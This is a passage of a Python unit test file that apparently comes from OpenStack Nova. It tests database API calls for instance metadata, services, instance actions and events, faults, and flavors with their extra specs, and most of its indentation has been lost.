instance = db.instance_create(self.ctxt, {'host': 'h1',
'project_id': 'p1', 'metadata': {'key': 'value'}})
        # This should add a new key/value pair
metadata = db.instance_metadata_update(
self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
# This should leave only one key/value pair
metadata = db.instance_metadata_update(
self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
class InstanceExtraTestCase(test.TestCase):
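    """Tests for db.api.instance_extra_* methods."""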
def setUp(self):
super(InstanceExtraTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def test_instance_extra_get_by_uuid_instance_create(self):
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertIsNotNone(inst_extra)
def test_instance_extra_update_by_uuid(self):
db.instance_extra_update_by_uuid(self.ctxt, self.instance['uuid'],
{'numa_topology': 'changed'})
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertEqual('changed', inst_extra.numa_topology)
def test_instance_extra_get_with_columns(self):
extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'],
columns=['numa_topology', 'vcpu_model'])
self.assertNotIn('pci_requests', extra)
self.assertIn('numa_topology', extra)
self.assertIn('vcpu_model', extra)
class ServiceTestCase(test.TestCase, ModelsObjectComparatorMixin):
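    """Tests for db.api.service_* methods."""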
def setUp(self):
super(ServiceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'host': 'fake_host',
'binary': 'fake_binary',
'topic': 'fake_topic',
'report_count': 3,
'disabled': False
}
def _create_service(self, values):
v = self._get_base_values()
v.update(values)
return db.service_create(self.ctxt, v)
def test_service_create(self):
service = self._create_service({})
self.assertIsNotNone(service['id'])
for key, value in self._get_base_values().iteritems():
self.assertEqual(value, service[key])
def test_service_destroy(self):
service1 = self._create_service({})
service2 = self._create_service({'host': 'fake_host2'})
db.service_destroy(self.ctxt, service1['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, service1['id'])
self._assertEqualObjects(db.service_get(self.ctxt, service2['id']),
service2, ignored_keys=['compute_node'])
def test_service_update(self):
service = self._create_service({})
new_values = {
'host': 'fake_host1',
'binary': 'fake_binary1',
'topic': 'fake_topic1',
'report_count': 4,
'disabled': True
}
db.service_update(self.ctxt, service['id'], new_values)
updated_service = db.service_get(self.ctxt, service['id'])
for key, value in new_values.iteritems():
self.assertEqual(value, updated_service[key])
def test_service_update_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_update, self.ctxt, 100500, {})
def test_service_get(self):
service1 = self._create_service({})
self._create_service({'host': 'some_other_fake_host'})
real_service1 = db.service_get(self.ctxt, service1['id'])
self._assertEqualObjects(service1, real_service1,
ignored_keys=['compute_node'])
def test_service_get_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, 100500)
def test_service_get_by_host_and_topic(self):
service1 = self._create_service({'host': 'host1', 'topic': 'topic1'})
self._create_service({'host': 'host2', 'topic': 'topic2'})
real_service1 = db.service_get_by_host_and_topic(self.ctxt,
host='host1',
topic='topic1')
self._assertEqualObjects(service1, real_service1)
def test_service_get_all(self):
values = [
{'host': 'host1', 'topic': 'topic1'},
{'host': 'host2', 'topic': 'topic2'},
{'disabled': True}
]
services = [self._create_service(vals) for vals in values]
disabled_services = [services[-1]]
non_disabled_services = services[:-1]
compares = [
(services, db.service_get_all(self.ctxt)),
(disabled_services, db.service_get_all(self.ctxt, True)),
(non_disabled_services, db.service_get_all(self.ctxt, False))
]
for comp in compares:
self._assertEqualListsOfObjects(*comp)
def test_service_get_all_by_topic(self):
values = [
{'host': 'host1', 'topic': 't1'},
{'host': 'host2', 'topic': 't1'},
{'disabled': True, 'topic': 't1'},
{'host': 'host3', 'topic': 't2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_topic(self.ctxt, 't1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_all_by_host(self):
values = [
{'host': 'host1', 'topic': 't11', 'binary': 'b11'},
{'host': 'host1', 'topic': 't12', 'binary': 'b12'},
{'host': 'host2', 'topic': 't1'},
{'host': 'host3', 'topic': 't1'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_host(self.ctxt, 'host1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_by_compute_host(self):
values = [
{'host': 'host1', 'topic': CONF.compute_topic},
{'host': 'host2', 'topic': 't1'},
{'host': 'host3', 'topic': CONF.compute_topic}
]
services = [self._create_service(vals) for vals in values]
real_service = db.service_get_by_compute_host(self.ctxt, 'host1')
self._assertEqualObjects(services[0], real_service,
ignored_keys=['compute_node'])
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_get_by_compute_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_get_by_args(self):
values = [
{'host': 'host1', 'binary': 'a'},
{'host': 'host2', 'binary': 'b'}
]
services = [self._create_service(vals) for vals in values]
service1 = db.service_get_by_args(self.ctxt, 'host1', 'a')
self._assertEqualObjects(services[0], service1)
service2 = db.service_get_by_args(self.ctxt, 'host2', 'b')
self._assertEqualObjects(services[1], service2)
def test_service_get_by_args_not_found_exception(self):
self.assertRaises(exception.HostBinaryNotFound,
db.service_get_by_args,
self.ctxt, 'non-exists-host', 'a')
def test_service_binary_exists_exception(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'topic': 'top1'})
self.assertRaises(exception.ServiceBinaryExists, db.service_create,
self.ctxt, values)
def test_service_topic_exists_exceptions(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'binary': 'bin1'})
self.assertRaises(exception.ServiceTopicExists, db.service_create,
self.ctxt, values)
class BaseInstanceTypeTestCase(test.TestCase, ModelsObjectComparatorMixin):
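    """Base test case with flavor creation helpers shared by flavor tests."""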
def setUp(self):
super(BaseInstanceTypeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.user_ctxt = context.RequestContext('user', 'user')
def _get_base_values(self):
return {
'name': 'fake_name',
'memory_mb': 512,
'vcpus': 1,
'root_gb': 10,
'ephemeral_gb': 10,
'flavorid': 'fake_flavor',
'swap': 0,
'rxtx_factor': 0.5,
'vcpu_weight': 1,
'disabled': False,
'is_public': True
}
def _create_flavor(self, values, projects=None):
v = self._get_base_values()
v.update(values)
return db.flavor_create(self.ctxt, v, projects)
class InstanceActionTestCase(test.TestCase, ModelsObjectComparatorMixin):
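    """Tests for db.api.action_* methods (instance actions and action events)."""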
IGNORED_FIELDS = [
'id',
'created_at',
'updated_at',
'deleted_at',
'deleted'
]
def setUp(self):
super(InstanceActionTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_action_values(self, uuid, action='run_instance',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
db.instance_create(ctxt, {'uuid': uuid})
values = {
'action': action,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'user_id': ctxt.user_id,
'project_id': ctxt.project_id,
'start_time': timeutils.utcnow(),
'message': 'action-message'
}
if extra is not None:
values.update(extra)
return values
def _create_event_values(self, uuid, event='schedule',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
values = {
'event': event,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'start_time': timeutils.utcnow(),
'host': 'fake-host',
'details': 'fake-details',
}
if extra is not None:
values.update(extra)
return values
def _assertActionSaved(self, action, uuid):
"""Retrieve the action to ensure it was successfully added."""
actions = db.actions_get(self.ctxt, uuid)
self.assertEqual(1, len(actions))
self._assertEqualObjects(action, actions[0])
def _assertActionEventSaved(self, event, action_id):
# Retrieve the event to ensure it was successfully added
events = db.action_events_get(self.ctxt, action_id)
self.assertEqual(1, len(events))
self._assertEqualObjects(event, events[0],
['instance_uuid', 'request_id'])
def test_instance_action_start(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
ignored_keys = self.IGNORED_FIELDS + ['finish_time']
self._assertEqualObjects(action_values, action, ignored_keys)
self._assertActionSaved(action, uuid)
def test_instance_action_finish(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
db.action_start(self.ctxt, action_values)
action_values['finish_time'] = timeutils.utcnow()
action = db.action_finish(self.ctxt, action_values)
self._assertEqualObjects(action_values, action, self.IGNORED_FIELDS)
self._assertActionSaved(action, uuid)
def test_instance_action_finish_without_started_event(self):
"""Create an instance finish action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action_values['finish_time'] = timeutils.utcnow()
self.assertRaises(exception.InstanceActionNotFound, db.action_finish,
self.ctxt, action_values)
def test_instance_actions_get_by_instance(self):
"""Ensure we can get actions by UUID."""
uuid1 = str(stdlib_uuid.uuid4())
expected = []
action_values = self._create_action_values(uuid1)
action = db.action_start(self.ctxt, action_values)
expected.append(action)
action_values['action'] = 'resize'
action = db.action_start(self.ctxt, action_values)
expected.append(action)
# Create some extra actions
uuid2 = str(stdlib_uuid.uuid4())
ctxt2 = context.get_admin_context()
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
# Retrieve the action to ensure it was successfully added
actions = db.actions_get(self.ctxt, uuid1)
self._assertEqualListsOfObjects(expected, actions)
def test_instance_actions_get_are_in_order(self):
"""Ensure retrived actions are in order."""
uuid1 = str(stdlib_uuid.uuid4())
extra = {
'created_at': timeutils.utcnow()
}
action_values = self._create_action_values(uuid1, extra=extra)
action1 = db.action_start(self.ctxt, action_values)
action_values['action'] = 'delete'
action2 = db.action_start(self.ctxt, action_values)
actions = db.actions_get(self.ctxt, uuid1)
self.assertEqual(2, len(actions))
self._assertEqualOrderedListOfObjects([action2, action1], actions)
def test_instance_action_get_by_instance_and_action(self):
"""Ensure we can get an action by instance UUID and action id."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid1)
db.action_start(self.ctxt, action_values)
request_id = action_values['request_id']
# NOTE(rpodolyaka): ensure we use a different req id for the 2nd req
action_values['action'] = 'resize'
action_values['request_id'] = 'req-00000000-7522-4d99-7ff-111111111111'
db.action_start(self.ctxt, action_values)
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
action = db.action_get_by_request_id(self.ctxt, uuid1, request_id)
self.assertEqual('run_instance', action['action'])
self.assertEqual(self.ctxt.request_id, action['request_id'])
def test_instance_action_event_start(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
event_values = self._create_event_values(uuid)
event = db.action_event_start(self.ctxt, event_values)
event_values['action_id'] = action['id']
ignored = self.IGNORED_FIELDS + ['finish_time', 'traceback', 'result']
self._assertEqualObjects(event_values, event, ignored)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_event_start_without_action(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = self._create_event_values(uuid)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_start, self.ctxt, event_values)
def test_instance_action_event_finish_without_started_event(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionEventNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_without_action(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_success(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertNotEqual('Error', action['message'])
def test_instance_action_event_finish_error(self):
"""Finish an instance action event with an error."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Error'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertEqual('Error', action['message'])
def test_instance_action_and_event_start_string_time(self):
"""Create an instance action and event with a string start_time."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {'start_time': timeutils.strtime(timeutils.utcnow())}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_start(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_events_get_are_in_order(self):
"""Ensure retrived action events are in order."""
uuid1 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
extra1 = {
'created_at': timeutils.utcnow()
}
extra2 = {
'created_at': timeutils.utcnow() + datetime.timedelta(seconds=5)
}
event_val1 = self._create_event_values(uuid1, 'schedule', extra=extra1)
event_val2 = self._create_event_values(uuid1, 'run', extra=extra1)
event_val3 = self._create_event_values(uuid1, 'stop', extra=extra2)
event1 = db.action_event_start(self.ctxt, event_val1)
event2 = db.action_event_start(self.ctxt, event_val2)
event3 = db.action_event_start(self.ctxt, event_val3)
events = db.action_events_get(self.ctxt, action['id'])
self.assertEqual(3, len(events))
self._assertEqualOrderedListOfObjects([event3, event2, event1], events,
['instance_uuid', 'request_id'])
def test_instance_action_event_get_by_id(self):
"""Get a specific instance action event."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
db.action_start(ctxt2,
self._create_action_values(uuid2, 'reboot', ctxt2))
event = db.action_event_start(self.ctxt,
self._create_event_values(uuid1))
event_values = self._create_event_values(uuid2, 'reboot', ctxt2)
db.action_event_start(ctxt2, event_values)
# Retrieve the event to ensure it was successfully added
saved_event = db.action_event_get_by_id(self.ctxt,
action['id'],
event['id'])
self._assertEqualObjects(event, saved_event,
['instance_uuid', 'request_id'])
class InstanceFaultTestCase(test.TestCase, ModelsObjectComparatorMixin):
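    """Tests for db.api.instance_fault_* methods."""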
def setUp(self):
super(InstanceFaultTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_fault_values(self, uuid, code=404):
return {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': code,
'host': 'localhost'
}
def test_instance_fault_create(self):
"""Ensure we can create an instance fault."""
uuid = str(stdlib_uuid.uuid4())
        # Ensure no faults are registered for this instance
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(0, len(faults[uuid]))
# Create a fault
fault_values = self._create_fault_values(uuid)
db.instance_create(self.ctxt, {'uuid': uuid})
fault = db.instance_fault_create(self.ctxt, fault_values)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(fault_values, fault, ignored_keys)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
def test_instance_fault_get_by_instance(self):
"""Ensure we can retrieve faults for instance."""
uuids = [str(stdlib_uuid.uuid4()), str(stdlib_uuid.uuid4())]
fault_codes = [404, 500]
expected = {}
# Create faults
for uuid in uuids:
db.instance_create(self.ctxt, {'uuid': uuid})
expected[uuid] = []
for code in fault_codes:
fault_values = self._create_fault_values(uuid, code)
fault = db.instance_fault_create(self.ctxt, fault_values)
expected[uuid].append(fault)
# Ensure faults are saved
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, uuids)
self.assertEqual(len(expected), len(faults))
for uuid in uuids:
self._assertEqualListsOfObjects(expected[uuid], faults[uuid])
def test_instance_faults_get_by_instance_uuids_no_faults(self):
uuid = str(stdlib_uuid.uuid4())
        # An empty list should be returned when no faults exist.
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
expected = {uuid: []}
self.assertEqual(expected, faults)
def test_instance_faults_get_by_instance_uuids_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [])
self.assertEqual({}, faults)
class InstanceTypeTestCase(BaseInstanceTypeTestCase):
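    """Tests for db.api.flavor_* methods."""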
def test_flavor_create(self):
flavor = self._create_flavor({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self.assertIsNotNone(flavor['id'])
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
def test_flavor_create_with_projects(self):
projects = ['fake-project1', 'fake-project2']
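        # Pass a duplicate project id; access rows should not be duplicated.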
flavor = self._create_flavor({}, projects + ['fake-project2'])
access = db.flavor_access_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self.assertEqual(projects, [x.project_id for x in access])
def test_flavor_destroy(self):
specs1 = {'a': '1', 'b': '2'}
flavor1 = self._create_flavor({'name': 'name1', 'flavorid': 'a1',
'extra_specs': specs1})
specs2 = {'c': '4', 'd': '3'}
flavor2 = self._create_flavor({'name': 'name2', 'flavorid': 'a2',
'extra_specs': specs2})
db.flavor_destroy(self.ctxt, 'name1')
self.assertRaises(exception.FlavorNotFound,
db.flavor_get, self.ctxt, flavor1['id'])
real_specs1 = db.flavor_extra_specs_get(self.ctxt, flavor1['flavorid'])
self._assertEqualObjects(real_specs1, {})
r_flavor2 = db.flavor_get(self.ctxt, flavor2['id'])
self._assertEqualObjects(flavor2, r_flavor2, 'extra_specs')
def test_flavor_destroy_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_destroy, self.ctxt, 'nonexists')
def test_flavor_create_duplicate_name(self):
self._create_flavor({})
self.assertRaises(exception.FlavorExists,
self._create_flavor,
{'flavorid': 'some_random_flavor'})
def test_flavor_create_duplicate_flavorid(self):
self._create_flavor({})
self.assertRaises(exception.FlavorIdExists,
self._create_flavor,
{'name': 'some_random_name'})
def test_flavor_create_with_extra_specs(self):
extra_specs = dict(a='abc', b='def', c='ghi')
flavor = self._create_flavor({'extra_specs': extra_specs})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
self._assertEqualObjects(extra_specs, flavor['extra_specs'])
def test_flavor_get_all(self):
# NOTE(boris-42): Remove base instance types
for it in db.flavor_get_all(self.ctxt):
db.flavor_destroy(self.ctxt, it['name'])
flavors = [
{'root_gb': 600, 'memory_mb': 100, 'disabled': True,
'is_public': True, 'name': 'a1', 'flavorid': 'f1'},
{'root_gb': 500, 'memory_mb': 200, 'disabled': True,
'is_public': True, 'name': 'a2', 'flavorid': 'f2'},
{'root_gb': 400, 'memory_mb': 300, 'disabled': False,
'is_public': True, 'name': 'a3', 'flavorid': 'f3'},
{'root_gb': 300, 'memory_mb': 400, 'disabled': False,
'is_public': False, 'name': 'a4', 'flavorid': 'f4'},
{'root_gb': 200, 'memory_mb': 500, 'disabled': True,
'is_public': False, 'name': 'a5', 'flavorid': 'f5'},
{'root_gb': 100, 'memory_mb': 600, 'disabled': True,
'is_public': False, 'name': 'a6', 'flavorid': 'f6'}
]
flavors = [self._create_flavor(it) for it in flavors]
lambda_filters = {
'min_memory_mb': lambda it, v: it['memory_mb'] >= v,
'min_root_gb': lambda it, v: it['root_gb'] >= v,
'disabled': lambda it, v: it['disabled'] == v,
'is_public': lambda it, v: (v is None or it['is_public'] == v)
}
mem_filts = [{'min_memory_mb': x} for x in [100, 350, 550, 650]]
root_filts = [{'min_root_gb': x} for x in [100, 350, 550, 650]]
disabled_filts = [{'disabled': x} for x in [True, False]]
is_public_filts = [{'is_public': x} for x in [True, False, None]]
def assert_multi_filter_flavor_get(filters=None):
if filters is None:
filters = {}
expected_it = flavors
for name, value in filters.iteritems():
filt = lambda it: lambda_filters[name](it, value)
expected_it = filter(filt, expected_it)
real_it = db.flavor_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects(expected_it, real_it)
# no filter
assert_multi_filter_flavor_get()
# test only with one filter
for filt in mem_filts:
assert_multi_filter_flavor_get(filt)
for filt in root_filts:
assert_multi_filter_flavor_get(filt)
for filt in disabled_filts:
assert_multi_filter_flavor_get(filt)
for filt in is_public_filts:
assert_multi_filter_flavor_get(filt)
# test all filters together
for mem in mem_filts:
for root in root_filts:
for disabled in disabled_filts:
for is_public in is_public_filts:
filts = [f.items() for f in
[mem, root, disabled, is_public]]
filts = dict(reduce(lambda x, y: x + y, filts, []))
assert_multi_filter_flavor_get(filts)
def test_flavor_get_all_limit_sort(self):
        def assert_sorted_by_key_dir(sort_key, asc=True):
            sort_dir = 'asc' if asc else 'desc'
            # Sort by the requested key rather than a hard-coded column
            results = db.flavor_get_all(self.ctxt, sort_key=sort_key,
                                        sort_dir=sort_dir)
            # Manually sort the results as we would expect them
            expected_results = sorted(results,
                                      key=lambda item: item[sort_key],
                                      reverse=(not asc))
            self.assertEqual(expected_results, results)
def assert_sorted_by_key_both_dir(sort_key):
assert_sorted_by_key_dir(sort_key, True)
assert_sorted_by_key_dir(sort_key, False)
for attr in ['memory_mb', 'root_gb', 'deleted_at', 'name', 'deleted',
'created_at', 'ephemeral_gb', 'updated_at', 'disabled',
'vcpus', 'swap', 'rxtx_factor', 'is_public', 'flavorid',
'vcpu_weight', 'id']:
assert_sorted_by_key_both_dir(attr)
def test_flavor_get_all_limit(self):
limited_flavors = db.flavor_get_all(self.ctxt, limit=2)
self.assertEqual(2, len(limited_flavors))
def test_flavor_get_all_list_marker(self):
all_flavors = db.flavor_get_all(self.ctxt)
# Set the 3rd result as the marker
marker_flavorid = all_flavors[2]['flavorid']
marked_flavors = db.flavor_get_all(self.ctxt, marker=marker_flavorid)
# We expect everything /after/ the 3rd result
expected_results = all_flavors[3:]
self.assertEqual(expected_results, marked_flavors)
def test_flavor_get_all_marker_not_found(self):
self.assertRaises(exception.MarkerNotFound,
db.flavor_get_all, self.ctxt, marker='invalid')
def test_flavor_get(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
# Regular user can not
self.assertRaises(exception.FlavorNotFound, db.flavor_get,
self.user_ctxt, flavor['id'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_id = db.flavor_get(self.user_ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_by_name(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_name_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.ctxt, 'nonexists')
def test_flavor_get_by_name_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
# Regular user can not
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.user_ctxt,
flavor['name'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_name = db.flavor_get_by_name(self.user_ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_flavor_id(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
params = (self.ctxt, flavor['flavorid'])
flavor_by_flavorid = db.flavor_get_by_flavor_id(*params)
self._assertEqualObjects(flavor, flavor_by_flavorid)
def test_flavor_get_by_flavor_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_get_by_flavor_id_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
# Regular user can not
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id, self.user_ctxt,
flavor['flavorid'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_fid = db.flavor_get_by_flavor_id(self.user_ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
def test_flavor_get_by_flavor_id_deleted(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123'})
db.flavor_destroy(self.ctxt, 'abc')
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
    def test_flavor_get_by_flavor_id_deleted_and_recreate(self):
# NOTE(wingwj): Aims to test difference between mysql and postgresql
# for bug 1288636
param_dict = {'name': 'abc', 'flavorid': '123'}
self._create_flavor(param_dict)
db.flavor_destroy(self.ctxt, 'abc')
# Recreate the flavor with the same params
flavor = self._create_flavor(param_dict)
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
class InstanceTypeExtraSpecsTestCase(BaseInstanceTypeTestCase):
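    """Tests for db.api.flavor_extra_specs_* methods."""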
def setUp(self):
super(InstanceTypeExtraSpecsTestCase, self).setUp()
values = ({'name': 'n1', 'flavorid': 'f1',
'extra_specs': dict(a='a', b='b', c='c')},
{'name': 'n2', 'flavorid': 'f2',
'extra_specs': dict(d='d', e='e', f='f')})
# NOTE(boris-42): We have already tested flavor_create method
# with extra_specs in InstanceTypeTestCase.
self.flavors = [self._create_flavor(v) for v in values]
def test_flavor_extra_specs_get(self):
for it in self.flavors:
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete(self):
for it in self.flavors:
specs = it['extra_specs']
key = specs.keys()[0]
del specs[key]
db.flavor_extra_specs_delete(self.ctxt, it['flavorid'], key)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete_failed(self):
for it in self.flavors:
self.assertRaises(exception.FlavorExtraSpecsNotFound,
db.flavor_extra_specs_delete,
self.ctxt, it['flavorid'], 'dummy')
def test_flavor_extra_specs_update_or_create(self):
for it in self.flavors:
current_specs = it['extra_specs']
current_specs.update(dict(b='b1', c='c1', d='d1', e='e1'))
params = (self.ctxt, it['flavorid'], current_specs)
db.flavor_extra_specs_update_or_create(*params)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(current_specs, real_specs)
def test_flavor_extra_specs_update_or_create_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_extra_specs_update_or_create,
self.ctxt, 'nonexists', {})
def test_flavor_extra_specs_update_or_create_retry(self):
def counted():
def get_id(context, flavorid, session):
get_id.counter += 1
raise db_exc.DBDuplicateEntry
get_id.counter = 0
return get_id
get_id = counted()
self.stubs.Set(sqlalchemy_api, '_flavor_get_id_from_flavor', get_id)
self.assertRaises(exception.FlavorExtraSpecUpdateCreateFailed,
sqlalchemy_api.flavor_extra_specs_update_or_create,
self.ctxt, 1, {}, 5)
self.assertEqual(get_id.counter, 5)
class InstanceTypeAccessTestCase(BaseInstanceTypeTestCase):
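    """Tests for db.api.flavor_access_* methods."""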
